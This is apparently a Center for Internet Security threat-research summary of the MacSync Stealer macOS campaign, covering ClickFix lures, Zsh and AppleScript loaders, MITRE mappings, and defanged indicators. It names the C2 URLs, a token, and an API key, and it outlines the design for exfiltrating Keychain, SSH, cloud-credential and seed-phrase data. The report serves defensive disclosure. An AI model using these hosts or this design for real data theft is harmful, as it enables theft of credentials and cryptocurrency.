Threat Research

MacSync Stealer Campaign Impacting U.S. SLTT macOS Users

cisecurity
MacSync Stealer Campaign Impacting U.S. SLTT macOS Users
MacSync Stealer is an active macOS infostealer campaign leveraging SEO poisoning and ClickFix fake CAPTCHA social engineering to trick U.S. SLTT users into pasting Terminal commands that fetch and execute Zsh and AppleScript payloads. The campaign features a Loader-as-a-Service model with API key‑gated C2 infrastructure and in-memory AppleScript execution to evade defenses and has trojanized Ledger desktop applications to persistently steal seed phrases. #MacSyncStealer #ClickFix

Keypoints

  • MacSync Stealer campaigns target U.S. State, Local, Tribal, and Territorial (SLTT) macOS users via SEO poisoning and fake CAPTCHA “ClickFix” pages that instruct victims to paste Terminal commands.
  • Threat actors moved from Mach-O binary delivery to a multistage Loader-as-a-Service (LaaS) model using shell-based loaders, API key-gated C2 domains, dynamic AppleScript payloads, and aggressive in-memory execution to bypass macOS defenses.
  • An MS-ISAC-submitted sample showed a Zsh script that retrieves a remote bootstrap script (via a 64‑char token in the URL) and a Stage 2 AppleScript executed by osascript, confirming per-victim dynamic payload generation and victim metadata injection.
  • The AppleScript infostealer implements nine data-collection modules targeting 13 Chromium and 4 Gecko browsers (including browser cookies, Login Data, IndexedDB, and extension settings), macOS Keychain, SSH keys, cloud credentials, Telegram data, and common sensitive user files.
  • MacSync Stealer includes cryptocurrency-focused capabilities: extracting extension and desktop wallet data and trojanizing Ledger desktop applications by replacing core files with backdoored versions that exfiltrate seed phrases on subsequent launches.
  • CIS CTI advises U.S. SLTTs to use MS-ISAC membership and services (including MDBR) for IOC sharing and proactive blocking; CIS disseminated over 1,000 IOCs and reported the campaign is likely to persist through 2026 due to ClickFix scalability.

MITRE Techniques

  • [T1204] User Execution – The campaign uses SEO poisoning and fake CAPTCHA pages to trick users into executing Terminal commands (‘redirects the victim to a fake CAPTCHA page hosted at hxxp://filegrowthlabs[.]com/s3/?c=…’).
  • [T1059] Command and Scripting Interpreter – Attackers deliver and execute Zsh shell scripts and AppleScript payloads to run code and collect data (‘the sample included a Zsh shell script and an AppleScript payload’).
  • [T1218] Signed Binary Proxy Execution – The AppleScript is passed into the native osascript interpreter and executed in memory to evade detection (‘the AppleScript payload is passed directly into the macOS’s native osascript interpreter and executed entirely in memory’).
  • [T1560] Archive Collected Data – Collected data is compiled into a temporary archive prior to exfiltration (‘compiles it into an archive it creates in the temp directory, /tmp/osalogging.zip’).
  • [T1041] Exfiltration Over C2 Channel – The Zsh script exfiltrates the archive to the C2 via HTTP PUT in 10 MB segments with retries and backoff (‘exfiltrates the file in 10 MB segments via HTTP PUT requests to the C2 server… up to eight retry attempts utilizing an incremental backoff strategy’).
  • [T1071] Application Layer Protocol – C2 communications and payload retrieval use HTTP(S) web protocols for transport and bootstrap retrieval (‘retrieves a remote Zsh shell script from hxxp://mansfieldpediatrics[.]com/curl/…’).
  • [T1555] Credentials from Password Stores – The payload harvests stored credentials and secrets including macOS Keychain, browser stored credentials, SSH private keys, AWS credentials, and Kubernetes config files (‘the payload harvests the macOS Keychain database, SSH private keys, AWS credentials, Kubernetes configuration files’).

Indicators of Compromise

  • [Domain ] Landing pages and C2 domains used in redirects and payload hosting – filegrowthlabs[.]com, mansfieldpediatrics[.]com, and houstongaragedoorinstallers[.]com.
  • [URL ] Malicious landing page and bootstrap endpoints – hxxp://filegrowthlabs[.]com/s3/?c=AA-0uWlVgQUAHYwCAFVTOQASAAAAAACP, hxxp://mansfieldpediatrics[.]com/curl/b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0.
  • [File Hash / Token ] 64-character bootstrap token used in /curl/ endpoint – b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0 (and other build-specific tokens reported in campaign samples).
  • [Hardcoded API Key ] Persistent campaign fingerprint value found in multiple samples – 5190ef1733183a0dc63fb623357f56d6 (hardcoded API key used for C2 authentication across deployments).
  • [File Name / Path ] Temporary staging and archive file paths created by payload – /tmp/sync[7‑digit‑random]/ and /tmp/osalogging.zip.
  • [Build Tag / Affiliate ] MaaS build identifier embedded in URLs and metadata – Build Tag “s3” used as the affiliate build landing page indicator.

Read more: https://www.cisecurity.org/insights/blog/macsync-stealer-campaign-impacting-us-sltt-macos-users